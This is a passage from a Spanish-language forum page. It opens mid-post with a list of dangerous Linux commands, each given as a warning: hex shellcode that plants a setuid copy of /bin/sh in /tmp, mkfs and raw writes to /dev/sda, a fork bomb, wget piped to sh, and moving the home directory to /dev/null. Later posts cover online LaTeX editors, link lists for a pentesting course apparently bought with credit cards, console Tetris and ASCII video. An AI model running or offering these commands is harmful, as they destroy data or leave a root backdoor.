    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00?
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";


La versión hexadecimal del anterior, la cual podría engañar a los usuarios más experimentados.

 
Código: text
  # mkfs.ext3 /dev/sda


Reformatea o elimina todos los archivos del dispositivo mencionado.

Código: text
    : (){:|:&};:

La conocida "bomba fork". Este comando hará que tu sistema ejecute un elevado número de procesos, hasta que el mismo se "cuelgue". A menudo esto puede acarrear perdida de datos. (Para que no me salte la carita dejo un espacio entre : y ( pero va junto)

   
Código: text
 cualquier_comando > /dev/sda


Con este comando, se envian bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

Código: text
    wget http://fuente_de_origen_inseguro -O- | sh


Estamos descargando datos, posiblemente un script, de alguna fuente no muy confiable, e inmediatamente después, estamos ordenando que se ejecute el archivo descargado. Nunca, nunca hagas esto.

   
Código: text
mv /home/tudirectoriodeusuario/* /dev/null


Este comando mueve todos los archivos dentro de tu home a un lugar que no existe, por lo cual, nunca podrás ver tus archivos de nuevo y se perderán en la oscuridad (mi favorito) xD.

Saludos :P
#37
Ahora no tenemos escusa para no trabajar donde nos encontremos trabajamos con LaTeX, con estos dos editores en linea  son ShareLaTeX y ScribTeX, llegue a estos buscando como agregar GeShi en la Tesis porque note un error en el código que andaba agregando, y se veia feo horriblemente, la verdad para comenzar comenzaremos indicando que es laNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta

CitarLa escritura colaborativa, también denominada hiperficción constructiva, es uno de los tipos de narrativa hipertextual, es decir, son los textos narrativos redactados mediante la colaboración entre varios autores, en especial gracias a la utilización de las "nuevas tecnologías". El formato wiki y el blog colectivo son dos de las formas que adopta la escritura colaborativa en este momento. (Fuente: Wkipedia)

En si a mi entender es necesario que exista un fuerte sincronización, entre los autores de un documento para que funcione la escritura colaborativa, para esto tenemos varios servicios en la nube que nos permiten trabajar con LaTeX especificamente.



1.- El editor de LaTeX online No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos permite trabajar de una manera fácil y sencilla, nos brinda un entorno completo con todo lo necesario para trabajar con documentos en LaTeX teniendo las caracteristicas principales  bibtex, imágenes y archivos personalizados de estilo, teniendo historias de version.
2.- No tienes permitido ver los links. Registrarse o Entrar a mi cuentaes un editor de nueva nube basada en LaTeX diseñado para hacer el trabajo en colaboración tan fácil como sea posible.
3.- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es un editor profesional de LaTeX en línea que permite colaborar con otros usuarios y es de uso gratuito. Combinar los conflictos pueden resolverse mediante el uso de una herramienta integrada en la mezcla que utiliza una implementación de la dif-algoritmo para generar la información necesaria para una fusión exitosa.
Google Documents  permite en tiempo real de la edición simultánea de colaboración de los archivos de texto para cualquier persona con una cuenta de Google.

Del mismo modo tenemos otros servicios los cuales nos pueden servir para el trabajo colaborativo no siempre haciendo algo en LaTeX desarrollo de un software y demas.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  que nos brinda almacenamiento gratuito y sistema de control de versiones. Funciona como SVN, pero más automatizado
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta permite escribir documentos en colaboración con cualquier persona en tiempo real.
Del mismo modo se tiene a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta personalmente no los use pero me ando yendo pa trabajar con GIT.

Conociendo ShareLaTeX



Nuevo proyecto

Creación de un nuevo Proyecto el cual indicando un nombre posteriormente nos permite añadir personal para la colaboración del trabajo en linea.



Luego de agregar al personal de trabajo con solo el correo que se registro a ShareLaTeX damos los permisos que tendra, del mismo modo en la parte superior podemos descargar todo el proyecto e inidicar cual sera el documento principal en la compilación.

Al agregar  un nuevo Usuario esto es lo que le aparecerá cuando ingrese a trabajar.

Name Last Updated

Código: text
PrivilegesSniferL4bs Sat, 04 Feb 2012 00:16:25 GMT 
Read and Write
Caratula Sat, 04 Feb 2012 00:14:12 GMT Read and Write




Aquí el ejemplo de la otra persona modificando el documento, en el lado inferior Izquierdo tenemos la opcion de mandar mensajes al momento indicando que estamos haciendo, como también observar los Log's y ver que se modifico...


Podemos Crear, Modificar, Eliminar archivos, siempre dando la extensión en la creación de archivos.



Luego de esto procedemos con la Compilación del documento haciendo click en el icono del PDF. En este caso me dio error.


Compilacion mia desde mi pC



Compilación Externa

Saludos :P


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38
Pentesting / Curso Pentesting
Diciembre 10, 2011, 10:21:06 PM
Buenas esto lo encontre en Artehack, subido por Queda de Faraó. solo lo comporta aver que les parece. todos los links estan Online comprobado

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
chicas hace mucho tiempo, estaba con algunas tarjetas de crédito, así que decidí comprar este curso
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   1_vm_iniciando_live_cd.html 1_vm_iniciando_live_cd
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   2_instalando.html 2_instalando   
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   3_atualizando_o_backtrack.html 3_atualizando o backtrack
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   4_iniciando_a_utilizacao_onlin.html 4_iniciando_a_utilizacao_online
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   5_conhecendo_o_backtrack.html 5_conhecendo_o_backtrack
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   6_comandos_de_rede.html 6_comandos de rede
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   7_fundamentos_de_scaneamento_d.html 7_fundamentos de scaneamento de portas
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   8_descoberta_de_hosts_com_nmap.html 8_descoberta de hosts com nmap
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   9_nmap_modo_grafico.html 9_nmap_modo_grafico
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   10_tecnicas_de_scaneamento_de_.html 10_tecnicas de scaneamento de portas
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   11_arpspoof_com_nmap.html 11_arpspoof com nmap
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   12_utilizando_script_no_nmap.html 12_utilizando script no nmap
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   13_invadindo_com_metasploit.html 13_invadindo com metasploit
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   14_scanner_mssqlscan.html 14_scanner_mssqlscan
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   15_mapa_de_rede_com_etherape.html 15_mapa de rede com etherape
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


#39
GNU/Linux / Jugando Tetris en la Consola
Diciembre 03, 2011, 04:13:41 PM
Ahora otro juego mas :D aparte del ya nombrado Snake luego tenemos el PacMan así que ahora viene otro mas de la mano de los juegos de consola :P.

Instalamos con :
Código: text

     sudo apt-get install bsdgames



e iniciamos el juego con :

Código: text

snifer@snifer:~$ tetris-bsd


Las teclas de movimiento son las siguientes:

J: Izquierda
K:
Rotamos la figura
L: Derecha
Space: Baja de golpe la figura
P: Pause
q: Salimos del programa


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Otro juego mas...
#40
Talvez diran Snifer esta medio loco, anda muy metido en la consola, por las entradas que llevo, pero no es asi mas que todo es que me ando enamorando de la shell :D

Ahora les muestro como ver un video en código ASCII

Para poder ver vídeos en la terminal necesitas MPlayer, así que instálalo:

Código: text
sudo apt-get install mplayer


En la terminal usa este comando para ver en ASCII:

Código: text

        mplayer -vo caca peliculaSnifer.avi


El parámetro caca es el driver del color del vídeo, también puedes probar con el parámetro aa para verlo en blanco negro.

Ahora viendo aqui un video que tengo ..




Y aqui abajo tenemos el video en su forma real.... diria .. formato normal ..


Saludos :P

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta